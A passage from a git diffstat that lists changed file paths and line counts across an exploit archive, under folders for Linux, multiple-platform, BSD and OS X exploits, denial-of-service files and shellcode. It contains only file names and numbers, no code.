4 +- platforms/irix/local/1577.sh | 20 +- platforms/irix/local/265.sh | 6 +- platforms/irix/local/270.sh | 6 +- platforms/irix/local/334.c | 6 +- platforms/irix/local/336.c | 6 +- platforms/irix/local/337.c | 6 +- platforms/jsp/webapps/5112.txt | 112 +- platforms/lin_amd64/shellcode/13296.c | 168 +- platforms/lin_amd64/shellcode/13297.c | 248 +- platforms/lin_x86-64/shellcode/13463.c | 177 +- platforms/lin_x86-64/shellcode/13464.s | 56 +- platforms/lin_x86/shellcode/13307.c | 142 +- platforms/lin_x86/shellcode/13308.c | 250 +- platforms/lin_x86/shellcode/13309.asm | 158 +- platforms/lin_x86/shellcode/13310.c | 100 +- platforms/lin_x86/shellcode/13311.c | 116 +- platforms/lin_x86/shellcode/13312.c | 94 +- platforms/lin_x86/shellcode/13313.c | 264 +- platforms/lin_x86/shellcode/13314.c | 64 +- platforms/lin_x86/shellcode/13315.c | 114 +- platforms/lin_x86/shellcode/13316.c | 68 +- platforms/lin_x86/shellcode/13317.s | 226 +- platforms/lin_x86/shellcode/13318.s | 272 +- platforms/lin_x86/shellcode/13319.s | 214 +- platforms/lin_x86/shellcode/13320.c | 78 +- platforms/lin_x86/shellcode/13321.c | 182 +- platforms/lin_x86/shellcode/13322.c | 58 +- platforms/lin_x86/shellcode/13323.c | 178 +- platforms/lin_x86/shellcode/13324.c | 130 +- platforms/lin_x86/shellcode/13325.c | 108 +- platforms/lin_x86/shellcode/13326.c | 98 +- platforms/lin_x86/shellcode/13327.c | 84 +- platforms/lin_x86/shellcode/13328.c | 444 +- platforms/lin_x86/shellcode/13329.c | 190 +- platforms/lin_x86/shellcode/13330.c | 206 +- platforms/lin_x86/shellcode/13331.c | 140 +- platforms/lin_x86/shellcode/13332.c | 106 +- platforms/lin_x86/shellcode/13333.txt | 112 +- platforms/lin_x86/shellcode/13334.txt | 106 +- platforms/lin_x86/shellcode/13335.c | 84 +- platforms/lin_x86/shellcode/13336.c | 78 +- platforms/lin_x86/shellcode/13337.c | 270 +- platforms/lin_x86/shellcode/13338.c | 86 +- platforms/lin_x86/shellcode/13339.asm | 384 +- platforms/lin_x86/shellcode/13340.c | 250 +- platforms/lin_x86/shellcode/13341.c | 146 +- platforms/lin_x86/shellcode/13342.c | 108 +- platforms/lin_x86/shellcode/13343.asm | 396 +- platforms/lin_x86/shellcode/13344.c | 88 +- platforms/lin_x86/shellcode/13345.c | 60 +- platforms/lin_x86/shellcode/13346.s | 152 +- platforms/lin_x86/shellcode/13347.c | 88 +- platforms/lin_x86/shellcode/13348.c | 76 +- platforms/lin_x86/shellcode/13350.c | 84 +- platforms/lin_x86/shellcode/13351.c | 48 +- platforms/lin_x86/shellcode/13352.c | 98 +- platforms/lin_x86/shellcode/13353.c | 86 +- platforms/lin_x86/shellcode/13354.c | 80 +- platforms/lin_x86/shellcode/13355.c | 254 +- platforms/lin_x86/shellcode/13356.c | 102 +- platforms/lin_x86/shellcode/13357.c | 110 +- platforms/lin_x86/shellcode/13358.c | 64 +- platforms/lin_x86/shellcode/13359.c | 82 +- platforms/lin_x86/shellcode/13360.c | 216 +- platforms/lin_x86/shellcode/13361.c | 196 +- platforms/lin_x86/shellcode/13362.c | 130 +- platforms/lin_x86/shellcode/13363.c | 322 +- platforms/lin_x86/shellcode/13364.c | 266 +- platforms/lin_x86/shellcode/13365.c | 62 +- platforms/lin_x86/shellcode/13367.c | 82 +- platforms/lin_x86/shellcode/13368.c | 84 +- platforms/lin_x86/shellcode/13369.c | 86 +- platforms/lin_x86/shellcode/13370.c | 84 +- platforms/lin_x86/shellcode/13371.c | 222 +- platforms/lin_x86/shellcode/13372.c | 210 +- platforms/lin_x86/shellcode/13373.c | 270 +- platforms/lin_x86/shellcode/13374.c | 170 +- platforms/lin_x86/shellcode/13375.c | 56 +- platforms/lin_x86/shellcode/13376.c | 60 +- platforms/lin_x86/shellcode/13377.c | 66 +- platforms/lin_x86/shellcode/13378.c | 76 +- platforms/lin_x86/shellcode/13379.c | 68 +- platforms/lin_x86/shellcode/13380.c | 280 +- platforms/lin_x86/shellcode/13381.c | 448 +- platforms/lin_x86/shellcode/13382.c | 154 +- platforms/lin_x86/shellcode/13383.c | 82 +- platforms/lin_x86/shellcode/13384.c | 66 +- platforms/lin_x86/shellcode/13385.c | 80 +- platforms/lin_x86/shellcode/13386.c | 106 +- platforms/lin_x86/shellcode/13387.c | 140 +- platforms/lin_x86/shellcode/13388.c | 184 +- platforms/lin_x86/shellcode/13389.c | 68 +- platforms/lin_x86/shellcode/13390.c | 60 +- platforms/lin_x86/shellcode/13391.c | 84 +- platforms/lin_x86/shellcode/13392.c | 52 +- platforms/lin_x86/shellcode/13393.c | 128 +- platforms/lin_x86/shellcode/13395.c | 88 +- platforms/lin_x86/shellcode/13396.c | 32 +- platforms/lin_x86/shellcode/13397.c | 40 +- platforms/lin_x86/shellcode/13398.c | 58 +- platforms/lin_x86/shellcode/13399.c | 50 +- platforms/lin_x86/shellcode/13400.c | 128 +- platforms/lin_x86/shellcode/13401.c | 100 +- platforms/lin_x86/shellcode/13402.c | 140 +- platforms/lin_x86/shellcode/13403.c | 56 +- platforms/lin_x86/shellcode/13404.c | 106 +- platforms/lin_x86/shellcode/13405.c | 44 +- platforms/lin_x86/shellcode/13406.c | 76 +- platforms/lin_x86/shellcode/13408.c | 318 +- platforms/lin_x86/shellcode/13409.c | 120 +- platforms/lin_x86/shellcode/13410.s | 640 +- platforms/lin_x86/shellcode/13411.c | 4 +- platforms/lin_x86/shellcode/13412.c | 4 +- platforms/lin_x86/shellcode/13413.c | 4 +- platforms/lin_x86/shellcode/13414.c | 4 +- platforms/lin_x86/shellcode/13416.txt | 4 +- platforms/lin_x86/shellcode/13417.c | 4 +- platforms/lin_x86/shellcode/13418.c | 4 +- platforms/lin_x86/shellcode/13419.c | 4 +- platforms/lin_x86/shellcode/13420.c | 4 +- platforms/lin_x86/shellcode/13421.c | 4 +- platforms/lin_x86/shellcode/13422.c | 4 +- platforms/lin_x86/shellcode/13423.c | 4 +- platforms/lin_x86/shellcode/13424.txt | 4 +- platforms/lin_x86/shellcode/13425.c | 4 +- platforms/lin_x86/shellcode/13426.c | 4 +- platforms/lin_x86/shellcode/13427.c | 4 +- platforms/lin_x86/shellcode/13428.c | 4 +- platforms/lin_x86/shellcode/13429.c | 4 +- platforms/lin_x86/shellcode/13430.c | 4 +- platforms/lin_x86/shellcode/13431.c | 4 +- platforms/lin_x86/shellcode/13432.c | 4 +- platforms/lin_x86/shellcode/13433.c | 4 +- platforms/lin_x86/shellcode/13434.c | 4 +- platforms/lin_x86/shellcode/13435.c | 4 +- platforms/lin_x86/shellcode/13436.c | 4 +- platforms/lin_x86/shellcode/13437.c | 4 +- platforms/lin_x86/shellcode/13438.c | 4 +- platforms/lin_x86/shellcode/13439.c | 4 +- platforms/lin_x86/shellcode/13440.c | 4 +- platforms/lin_x86/shellcode/13441.c | 4 +- platforms/lin_x86/shellcode/13442.c | 4 +- platforms/lin_x86/shellcode/13443.c | 4 +- platforms/lin_x86/shellcode/13444.c | 4 +- platforms/lin_x86/shellcode/13445.c | 4 +- platforms/lin_x86/shellcode/13446.c | 4 +- platforms/lin_x86/shellcode/13447.c | 4 +- platforms/lin_x86/shellcode/13448.c | 4 +- platforms/lin_x86/shellcode/13449.c | 4 +- platforms/lin_x86/shellcode/13450.c | 4 +- platforms/lin_x86/shellcode/13451.c | 4 +- platforms/lin_x86/shellcode/13452.c | 4 +- platforms/lin_x86/shellcode/13453.c | 4 +- platforms/lin_x86/shellcode/13454.c | 4 +- platforms/lin_x86/shellcode/13455.c | 4 +- platforms/lin_x86/shellcode/13456.c | 4 +- platforms/lin_x86/shellcode/13457.c | 4 +- platforms/lin_x86/shellcode/13458.c | 4 +- platforms/lin_x86/shellcode/13459.c | 4 +- platforms/lin_x86/shellcode/13460.c | 4 +- platforms/lin_x86/shellcode/13461.c | 4 +- platforms/lin_x86/shellcode/13462.c | 4 +- platforms/linux/dos/1196.c | 6 +- platforms/linux/dos/1634.pl | 188 +- platforms/linux/dos/1641.pl | 768 +- platforms/linux/dos/1657.asm | 88 +- platforms/linux/dos/1746.pl | 52 +- platforms/linux/dos/1815.c | 212 +- platforms/linux/dos/185.sh | 6 +- platforms/linux/dos/1852.c | 190 +- platforms/linux/dos/1894.py | 166 +- platforms/linux/dos/2051.py | 594 +- platforms/linux/dos/236.sh | 6 +- platforms/linux/dos/238.c | 6 +- platforms/linux/dos/251.c | 6 +- platforms/linux/dos/274.c | 6 +- platforms/linux/dos/2892.py | 84 +- platforms/linux/dos/2893.py | 114 +- platforms/linux/dos/2954.html | 72 +- platforms/linux/dos/3023.c | 176 +- platforms/linux/dos/306.c | 6 +- platforms/linux/dos/3396.php | 112 +- platforms/linux/dos/3415.html | 56 +- platforms/linux/dos/3441.c | 84 +- platforms/linux/dos/3586.php | 84 +- platforms/linux/dos/370.c | 6 +- platforms/linux/dos/3769.c | 280 +- platforms/linux/dos/3807.c | 308 +- platforms/linux/dos/4216.pl | 76 +- platforms/linux/dos/4347.pl | 286 +- platforms/linux/dos/4532.pl | 170 +- platforms/linux/dos/4535.pl | 158 +- platforms/linux/dos/4600.py | 76 +- platforms/linux/dos/4732.c | 458 +- platforms/linux/dos/5210.c | 228 +- platforms/linux/dos/5307.pl | 262 +- platforms/linux/dos/5458.txt | 58 +- platforms/linux/dos/551.c | 6 +- platforms/linux/dos/5561.pl | 46 +- platforms/linux/dos/5585.pl | 190 +- platforms/linux/dos/5814.pl | 70 +- platforms/linux/dos/6689.txt | 192 +- platforms/linux/dos/6704.txt | 24 +- platforms/linux/dos/6718.html | 20 +- platforms/linux/dos/7091.c | 244 +- platforms/linux/dos/7100.pl | 122 +- platforms/linux/dos/7150.html | 52 +- platforms/linux/dos/815.c | 6 +- platforms/linux/dos/8205.pl | 152 +- platforms/linux/dos/8469.c | 6416 ++++---- platforms/linux/dos/8544.pl | 116 +- platforms/linux/dos/8960.py | 160 +- platforms/linux/dos/8982.txt | 40 +- platforms/linux/dos/904.c | 6 +- platforms/linux/dos/911.c | 6 +- platforms/linux/dos/9265.c | 616 +- platforms/linux/dos/9442.c | 352 +- platforms/linux/dos/957.c | 6 +- platforms/linux/dos/958.c | 6 +- platforms/linux/dos/959.c | 6 +- platforms/linux/dos/998.c | 6 +- platforms/linux/dos/999.c | 6 +- platforms/linux/local/1009.c | 6 +- platforms/linux/local/1029.c | 6 +- platforms/linux/local/106.c | 6 +- platforms/linux/local/1154.pl | 6 +- platforms/linux/local/1170.c | 6 +- platforms/linux/local/1181.c | 6 +- platforms/linux/local/1187.c | 6 +- platforms/linux/local/1215.c | 110 +- platforms/linux/local/1297.py | 478 +- platforms/linux/local/1299.sh | 74 +- platforms/linux/local/1300.sh | 214 +- platforms/linux/local/1316.pl | 132 +- platforms/linux/local/1412.rb | 68 +- platforms/linux/local/1415.c | 196 +- platforms/linux/local/1425.c | 224 +- platforms/linux/local/144.c | 6 +- platforms/linux/local/1445.c | 204 +- platforms/linux/local/1449.c | 106 +- platforms/linux/local/1579.pl | 124 +- platforms/linux/local/1591.py | 94 +- platforms/linux/local/178.c | 6 +- platforms/linux/local/180.c | 6 +- platforms/linux/local/182.sh | 8 +- platforms/linux/local/183.c | 6 +- platforms/linux/local/184.pl | 6 +- platforms/linux/local/186.pl | 6 +- platforms/linux/local/193.sh | 6 +- platforms/linux/local/2016.sh | 24 +- platforms/linux/local/203.sh | 6 +- platforms/linux/local/206.c | 6 +- platforms/linux/local/209.c | 6 +- platforms/linux/local/2144.sh | 52 +- platforms/linux/local/215.c | 6 +- platforms/linux/local/217.c | 6 +- platforms/linux/local/218.c | 6 +- platforms/linux/local/219.c | 6 +- platforms/linux/local/2193.php | 274 +- platforms/linux/local/221.c | 6 +- platforms/linux/local/222.c | 6 +- platforms/linux/local/229.c | 6 +- platforms/linux/local/231.sh | 6 +- platforms/linux/local/2338.c | 250 +- platforms/linux/local/2404.c | 416 +- platforms/linux/local/2466.pl | 82 +- platforms/linux/local/249.c | 6 +- platforms/linux/local/2492.s | 658 +- platforms/linux/local/255.pl | 6 +- platforms/linux/local/257.pl | 6 +- platforms/linux/local/2581.c | 688 +- platforms/linux/local/273.c | 6 +- platforms/linux/local/285.c | 6 +- platforms/linux/local/290.sh | 6 +- platforms/linux/local/317.txt | 6 +- platforms/linux/local/320.pl | 6 +- platforms/linux/local/3213.c | 310 +- platforms/linux/local/322.c | 6 +- platforms/linux/local/325.c | 6 +- platforms/linux/local/331.c | 6 +- platforms/linux/local/3356.sh | 390 +- platforms/linux/local/3384.c | 62 +- platforms/linux/local/339.c | 6 +- platforms/linux/local/3426.php | 188 +- platforms/linux/local/3427.php | 136 +- platforms/linux/local/3440.php | 94 +- platforms/linux/local/3479.php | 308 +- platforms/linux/local/3480.php | 318 +- platforms/linux/local/3499.php | 106 +- platforms/linux/local/3525.php | 352 +- platforms/linux/local/3529.php | 266 +- platforms/linux/local/3571.php | 86 +- platforms/linux/local/3572.php | 224 +- platforms/linux/local/369.pl | 6 +- platforms/linux/local/375.c | 6 +- platforms/linux/local/393.c | 6 +- platforms/linux/local/4028.txt | 128 +- platforms/linux/local/417.c | 6 +- platforms/linux/local/434.sh | 6 +- platforms/linux/local/438.c | 6 +- platforms/linux/local/4460.c | 278 +- platforms/linux/local/466.pl | 6 +- platforms/linux/local/469.c | 6 +- platforms/linux/local/4698.c | 116 +- platforms/linux/local/470.c | 6 +- platforms/linux/local/4756.c | 335 +- platforms/linux/local/476.c | 6 +- platforms/linux/local/479.c | 6 +- platforms/linux/local/5092.c | 578 +- platforms/linux/local/5093.c | 294 +- platforms/linux/local/586.c | 6 +- platforms/linux/local/587.c | 6 +- platforms/linux/local/591.c | 6 +- platforms/linux/local/600.c | 6 +- platforms/linux/local/601.c | 6 +- platforms/linux/local/6032.py | 1100 +- platforms/linux/local/624.c | 6 +- platforms/linux/local/657.c | 6 +- platforms/linux/local/669.c | 6 +- platforms/linux/local/6851.c | 176 +- platforms/linux/local/695.c | 6 +- platforms/linux/local/71.c | 6 +- platforms/linux/local/7177.c | 602 +- platforms/linux/local/7313.sh | 196 +- platforms/linux/local/7393.txt | 231 +- platforms/linux/local/741.pl | 6 +- platforms/linux/local/7681.txt | 54 +- platforms/linux/local/776.c | 6 +- platforms/linux/local/796.sh | 92 +- platforms/linux/local/816.c | 6 +- platforms/linux/local/824.c | 6 +- platforms/linux/local/8303.c | 326 +- platforms/linux/local/8369.sh | 206 +- platforms/linux/local/8470.py | 430 +- platforms/linux/local/8534.c | 374 +- platforms/linux/local/876.c | 6 +- platforms/linux/local/877.pl | 6 +- platforms/linux/local/890.pl | 6 +- platforms/linux/local/895.c | 6 +- platforms/linux/local/913.pl | 6 +- platforms/linux/local/9135.sh | 64 +- platforms/linux/local/914.c | 6 +- platforms/linux/local/924.c | 6 +- platforms/linux/local/9302.py | 82 +- platforms/linux/local/950.c | 6 +- platforms/linux/local/9595.c | 162 +- platforms/linux/local/9608.c | 274 +- platforms/linux/local/973.c | 6 +- platforms/linux/local/974.pl | 6 +- platforms/linux/local/997.sh | 6 +- platforms/linux/remote/102.c | 6 +- platforms/linux/remote/1021.c | 6 +- platforms/linux/remote/1038.c | 6 +- platforms/linux/remote/1047.pl | 6 +- platforms/linux/remote/1055.c | 6 +- platforms/linux/remote/1123.c | 6 +- platforms/linux/remote/1138.c | 6 +- platforms/linux/remote/1139.c | 6 +- platforms/linux/remote/1171.c | 6 +- platforms/linux/remote/1209.c | 6 +- platforms/linux/remote/1232.c | 510 +- platforms/linux/remote/1238.c | 94 +- platforms/linux/remote/1242.pl | 282 +- platforms/linux/remote/1247.pl | 444 +- platforms/linux/remote/126.c | 6 +- platforms/linux/remote/1272.c | 838 +- platforms/linux/remote/1288.pl | 410 +- platforms/linux/remote/1290.pl | 358 +- platforms/linux/remote/1291.pl | 222 +- platforms/linux/remote/1314.rb | 170 +- platforms/linux/remote/1355.pl | 96 +- platforms/linux/remote/1456.c | 738 +- platforms/linux/remote/1474.pm | 546 +- platforms/linux/remote/1486.c | 726 +- platforms/linux/remote/1487.c | 694 +- platforms/linux/remote/1574.c | 562 +- platforms/linux/remote/1578.c | 268 +- platforms/linux/remote/167.c | 6 +- platforms/linux/remote/1717.c | 550 +- platforms/linux/remote/173.pl | 6 +- platforms/linux/remote/174.c | 6 +- platforms/linux/remote/1741.c | 802 +- platforms/linux/remote/1742.c | 454 +- platforms/linux/remote/1750.c | 490 +- platforms/linux/remote/181.c | 6 +- platforms/linux/remote/2185.pl | 124 +- platforms/linux/remote/220.c | 6 +- platforms/linux/remote/225.c | 6 +- platforms/linux/remote/226.c | 6 +- platforms/linux/remote/227.c | 6 +- platforms/linux/remote/2274.c | 552 +- platforms/linux/remote/230.c | 6 +- platforms/linux/remote/237.c | 6 +- platforms/linux/remote/27.pl | 6 +- platforms/linux/remote/277.c | 6 +- platforms/linux/remote/279.c | 6 +- platforms/linux/remote/282.c | 6 +- platforms/linux/remote/2933.c | 762 +- platforms/linux/remote/2959.sql | 154 +- platforms/linux/remote/296.c | 6 +- platforms/linux/remote/303.pl | 6 +- platforms/linux/remote/307.py | 6 +- platforms/linux/remote/308.c | 6 +- platforms/linux/remote/3099.pm | 248 +- platforms/linux/remote/3329.c | 494 +- platforms/linux/remote/3389.c | 774 +- platforms/linux/remote/340.c | 6 +- platforms/linux/remote/346.c | 6 +- platforms/linux/remote/347.c | 6 +- platforms/linux/remote/348.c | 6 +- platforms/linux/remote/359.c | 6 +- platforms/linux/remote/3609.py | 172 +- platforms/linux/remote/3615.c | 602 +- platforms/linux/remote/3698.txt | 290 +- platforms/linux/remote/372.c | 6 +- platforms/linux/remote/373.c | 6 +- platforms/linux/remote/3787.c | 732 +- platforms/linux/remote/379.txt | 6 +- platforms/linux/remote/380.c | 6 +- platforms/linux/remote/3815.c | 740 +- platforms/linux/remote/382.c | 6 +- platforms/linux/remote/386.c | 6 +- platforms/linux/remote/387.c | 6 +- platforms/linux/remote/389.c | 6 +- platforms/linux/remote/39.c | 6 +- platforms/linux/remote/390.c | 6 +- platforms/linux/remote/397.c | 6 +- platforms/linux/remote/398.c | 6 +- platforms/linux/remote/399.c | 6 +- platforms/linux/remote/405.c | 6 +- platforms/linux/remote/408.c | 6 +- platforms/linux/remote/4087.c | 316 +- platforms/linux/remote/416.c | 6 +- platforms/linux/remote/4162.c | 822 +- platforms/linux/remote/424.c | 6 +- platforms/linux/remote/4315.py | 4 +- platforms/linux/remote/4362.pl | 44 +- platforms/linux/remote/437.c | 6 +- platforms/linux/remote/4437.c | 1082 +- platforms/linux/remote/4478.c | 552 +- platforms/linux/remote/4514.c | 272 +- platforms/linux/remote/4533.c | 440 +- platforms/linux/remote/4534.c | 596 +- platforms/linux/remote/4541.c | 772 +- platforms/linux/remote/4542.py | 60 +- platforms/linux/remote/4552.pl | 172 +- platforms/linux/remote/46.c | 6 +- platforms/linux/remote/4862.py | 146 +- platforms/linux/remote/49.c | 6 +- platforms/linux/remote/4947.c | 296 +- platforms/linux/remote/5224.php | 3128 ++-- platforms/linux/remote/5283.txt | 94 +- platforms/linux/remote/58.c | 6 +- platforms/linux/remote/580.c | 6 +- platforms/linux/remote/608.c | 6 +- platforms/linux/remote/6094.txt | 48 +- platforms/linux/remote/620.c | 6 +- platforms/linux/remote/652.c | 6 +- platforms/linux/remote/660.c | 6 +- platforms/linux/remote/7151.c | 552 +- platforms/linux/remote/7183.txt | 206 +- platforms/linux/remote/806.c | 6 +- platforms/linux/remote/812.c | 6 +- platforms/linux/remote/826.c | 6 +- platforms/linux/remote/831.c | 6 +- platforms/linux/remote/8384.txt | 374 +- platforms/linux/remote/84.c | 6 +- platforms/linux/remote/8569.txt | 78 +- platforms/linux/remote/8570.txt | 62 +- platforms/linux/remote/878.c | 6 +- platforms/linux/remote/8880.txt | 1442 +- platforms/linux/remote/900.c | 6 +- platforms/linux/remote/902.c | 6 +- platforms/linux/remote/903.c | 6 +- platforms/linux/remote/9143.txt | 230 +- platforms/linux/remote/915.c | 6 +- platforms/linux/remote/934.c | 6 +- platforms/linux/remote/940.c | 6 +- platforms/linux/remote/970.c | 6 +- platforms/linux/remote/981.c | 6 +- platforms/linux/remote/99.c | 6 +- platforms/linux_mips/shellcode/13298.c | 182 +- platforms/linux_mips/shellcode/13299.c | 76 +- platforms/linux_mips/shellcode/13300.c | 60 +- platforms/linux_ppc/shellcode/13301.c | 54 +- platforms/linux_ppc/shellcode/13302.c | 40 +- platforms/linux_ppc/shellcode/13303.c | 162 +- platforms/linux_ppc/shellcode/13304.c | 4 +- platforms/linux_sparc/shellcode/13305.c | 4 +- platforms/linux_sparc/shellcode/13306.c | 4 +- platforms/minix/dos/6120.txt | 56 +- platforms/minix/dos/6129.txt | 42 +- platforms/multiple/dos/1008.c | 6 +- platforms/multiple/dos/1037.c | 6 +- platforms/multiple/dos/1056.pl | 6 +- platforms/multiple/dos/1176.c | 6 +- platforms/multiple/dos/1204.html | 5 +- platforms/multiple/dos/1213.c | 7 +- platforms/multiple/dos/1254.html | 22 +- platforms/multiple/dos/1256.pl | 222 +- platforms/multiple/dos/1268.pl | 282 +- platforms/multiple/dos/1331.c | 182 +- platforms/multiple/dos/1390.c | 732 +- platforms/multiple/dos/1489.pl | 92 +- platforms/multiple/dos/1572.pl | 128 +- platforms/multiple/dos/1671.c | 520 +- platforms/multiple/dos/1819.txt | 158 +- platforms/multiple/dos/1937.html | 4 +- platforms/multiple/dos/1947.c | 180 +- platforms/multiple/dos/1972.txt | 56 +- platforms/multiple/dos/2073.c | 302 +- platforms/multiple/dos/2179.c | 214 +- platforms/multiple/dos/2180.py | 306 +- platforms/multiple/dos/2303.html | 68 +- platforms/multiple/dos/2444.sh | 244 +- platforms/multiple/dos/2515.txt | 74 +- platforms/multiple/dos/2586.pl | 376 +- platforms/multiple/dos/2597.pl | 60 +- platforms/multiple/dos/2857.php | 54 +- platforms/multiple/dos/2947.pl | 126 +- platforms/multiple/dos/3101.py | 1118 +- platforms/multiple/dos/3362.py | 152 +- platforms/multiple/dos/3394.php | 142 +- platforms/multiple/dos/3404.php | 62 +- platforms/multiple/dos/3407.c | 252 +- platforms/multiple/dos/3434.c | 584 +- platforms/multiple/dos/3566.pl | 42 +- platforms/multiple/dos/3709.html | 38 +- platforms/multiple/dos/3726.c | 380 +- platforms/multiple/dos/3784.c | 226 +- platforms/multiple/dos/3851.c | 330 +- platforms/multiple/dos/3871.html | 102 +- platforms/multiple/dos/4038.pl | 278 +- platforms/multiple/dos/4175.php | 46 +- platforms/multiple/dos/4181.php | 72 +- platforms/multiple/dos/4196.c | 362 +- platforms/multiple/dos/4249.rb | 342 +- platforms/multiple/dos/4260.php | 48 +- platforms/multiple/dos/4432.html | 40 +- platforms/multiple/dos/4540.pl | 60 +- platforms/multiple/dos/4615.txt | 60 +- platforms/multiple/dos/4648.py | 150 +- platforms/multiple/dos/4856.php | 374 +- platforms/multiple/dos/4997.sql | 112 +- platforms/multiple/dos/5268.html | 78 +- platforms/multiple/dos/5306.txt | 78 +- platforms/multiple/dos/5679.php | 158 +- platforms/multiple/dos/5712.pl | 46 +- platforms/multiple/dos/5749.pl | 90 +- platforms/multiple/dos/6046.txt | 182 +- platforms/multiple/dos/6218.txt | 802 +- platforms/multiple/dos/6239.txt | 176 +- platforms/multiple/dos/6293.txt | 226 +- platforms/multiple/dos/6471.pl | 76 +- platforms/multiple/dos/6805.txt | 512 +- platforms/multiple/dos/7330.c | 180 +- platforms/multiple/dos/7467.txt | 58 +- platforms/multiple/dos/7520.c | 170 +- platforms/multiple/dos/7555.py | 46 +- platforms/multiple/dos/7564.pl | 114 +- platforms/multiple/dos/7643.txt | 66 +- platforms/multiple/dos/7647.txt | 156 +- platforms/multiple/dos/7673.html | 274 +- platforms/multiple/dos/7685.pl | 76 +- platforms/multiple/dos/7785.py | 56 +- platforms/multiple/dos/7812.pl | 98 +- platforms/multiple/dos/8091.html | 14 +- platforms/multiple/dos/8148.pl | 132 +- platforms/multiple/dos/8219.html | 20 +- platforms/multiple/dos/8241.txt | 254 +- platforms/multiple/dos/8245.c | 182 +- platforms/multiple/dos/8308.c | 88 +- platforms/multiple/dos/8320.py | 129 +- platforms/multiple/dos/8337.c | 758 +- platforms/multiple/dos/838.pl | 6 +- platforms/multiple/dos/8429.pl | 50 +- platforms/multiple/dos/855.pl | 6 +- platforms/multiple/dos/8646.php | 92 +- platforms/multiple/dos/8669.c | 284 +- platforms/multiple/dos/8695.txt | 120 +- platforms/multiple/dos/8720.c | 288 +- platforms/multiple/dos/8794.htm | 200 +- platforms/multiple/dos/880.pl | 6 +- platforms/multiple/dos/8822.txt | 240 +- platforms/multiple/dos/8873.c | 184 +- platforms/multiple/dos/8940.pl | 1020 +- platforms/multiple/dos/8957.txt | 260 +- platforms/multiple/dos/9071.txt | 168 +- platforms/multiple/dos/9160.txt | 296 +- platforms/multiple/dos/9175.txt | 162 +- platforms/multiple/dos/9198.txt | 646 +- platforms/multiple/dos/9323.txt | 68 +- platforms/multiple/dos/946.c | 6 +- platforms/multiple/dos/956.c | 6 +- platforms/multiple/dos/984.c | 6 +- platforms/multiple/local/1119.txt | 6 +- platforms/multiple/local/1554.c | 270 +- platforms/multiple/local/1719.txt | 120 +- platforms/multiple/local/1924.txt | 112 +- platforms/multiple/local/288.c | 6 +- platforms/multiple/local/3177.txt | 92 +- platforms/multiple/local/3178.txt | 84 +- platforms/multiple/local/3179.txt | 84 +- platforms/multiple/local/321.c | 6 +- platforms/multiple/local/3413.php | 112 +- platforms/multiple/local/3414.php | 98 +- platforms/multiple/local/3424.php | 138 +- platforms/multiple/local/3442.php | 172 +- platforms/multiple/local/3559.php | 112 +- platforms/multiple/local/4392.txt | 159 +- platforms/multiple/local/4564.txt | 138 +- platforms/multiple/local/4570.pl | 226 +- platforms/multiple/local/4571.pl | 254 +- platforms/multiple/local/4572.txt | 100 +- platforms/multiple/local/4994.sql | 102 +- platforms/multiple/local/4995.sql | 102 +- platforms/multiple/local/4996.sql | 102 +- platforms/multiple/local/629.c | 6 +- platforms/multiple/local/7171.txt | 186 +- platforms/multiple/local/7503.txt | 46 +- platforms/multiple/local/7646.txt | 752 +- platforms/multiple/local/7675.txt | 150 +- platforms/multiple/local/7676.txt | 140 +- platforms/multiple/local/7677.txt | 264 +- platforms/multiple/local/8456.txt | 152 +- platforms/multiple/local/8641.txt | 110 +- platforms/multiple/local/9072.txt | 112 +- platforms/multiple/local/9520.txt | 186 +- platforms/multiple/remote/1007.html | 14 +- platforms/multiple/remote/1188.c | 6 +- platforms/multiple/remote/1263.pl | 306 +- platforms/multiple/remote/1292.pm | 296 +- platforms/multiple/remote/201.c | 6 +- platforms/multiple/remote/2053.rb | 174 +- platforms/multiple/remote/2061.txt | 46 +- platforms/multiple/remote/2784.html | 108 +- platforms/multiple/remote/2837.sql | 200 +- platforms/multiple/remote/300.c | 6 +- platforms/multiple/remote/3064.rb | 124 +- platforms/multiple/remote/311.pl | 6 +- platforms/multiple/remote/3269.pl | 240 +- platforms/multiple/remote/3303.sh | 174 +- platforms/multiple/remote/3358.pl | 250 +- platforms/multiple/remote/3359.pl | 250 +- platforms/multiple/remote/3363.pl | 244 +- platforms/multiple/remote/3405.txt | 36 +- platforms/multiple/remote/3425.txt | 96 +- platforms/multiple/remote/3452.php | 108 +- platforms/multiple/remote/3585.pl | 224 +- platforms/multiple/remote/3654.pl | 330 +- platforms/multiple/remote/39569.py | 498 + platforms/multiple/remote/4093.pl | 190 +- platforms/multiple/remote/4391.c | 288 +- platforms/multiple/remote/4399.html | 28 +- platforms/multiple/remote/4530.pl | 158 +- platforms/multiple/remote/4556.txt | 150 +- platforms/multiple/remote/4761.pl | 56 +- platforms/multiple/remote/5215.txt | 222 +- platforms/multiple/remote/5430.txt | 302 +- platforms/multiple/remote/5534.txt | 302 +- platforms/multiple/remote/6122.rb | 944 +- platforms/multiple/remote/6123.py | 224 +- platforms/multiple/remote/6130.c | 728 +- platforms/multiple/remote/689.pl | 6 +- platforms/multiple/remote/7760.php | 276 +- platforms/multiple/remote/7781.txt | 274 +- platforms/multiple/remote/805.c | 6 +- platforms/multiple/remote/8097.txt | 28 +- platforms/multiple/remote/8191.txt | 160 +- platforms/multiple/remote/8458.txt | 174 +- platforms/multiple/remote/86.c | 6 +- platforms/multiple/remote/8786.txt | 140 +- platforms/multiple/remote/879.pl | 6 +- platforms/multiple/remote/8907.txt | 84 +- platforms/multiple/remote/9651.txt | 134 +- platforms/multiple/shellcode/13465.c | 152 +- platforms/multiple/shellcode/13466.c | 122 +- platforms/multiple/shellcode/13467.c | 4 +- platforms/multiple/shellcode/13468.c | 4 +- platforms/multiple/shellcode/13469.c | 4 +- platforms/multiple/webapps/14606.html | 4 +- platforms/netbsd_x86/shellcode/13471.c | 140 +- platforms/netbsd_x86/shellcode/13472.c | 72 +- platforms/netbsd_x86/shellcode/13473.c | 68 +- platforms/netbsd_x86/shellcode/13474.txt | 4 +- platforms/novell/dos/264.c | 6 +- platforms/novell/remote/1679.pm | 245 +- platforms/openbsd/dos/8406.txt | 122 +- platforms/openbsd/dos/8430.py | 18 +- platforms/openbsd/local/5979.c | 488 +- platforms/openbsd_x86/shellcode/13475.c | 126 +- platforms/openbsd_x86/shellcode/13476.c | 4 +- platforms/openbsd_x86/shellcode/13477.c | 4 +- platforms/osx/dos/1712.html | 152 +- platforms/osx/dos/1715.html | 76 +- platforms/osx/dos/3069.pl | 82 +- platforms/osx/dos/3080.rb | 90 +- platforms/osx/dos/3098.html | 44 +- platforms/osx/dos/3110.rb | 54 +- platforms/osx/dos/3130.c | 120 +- platforms/osx/dos/3139.rb | 148 +- 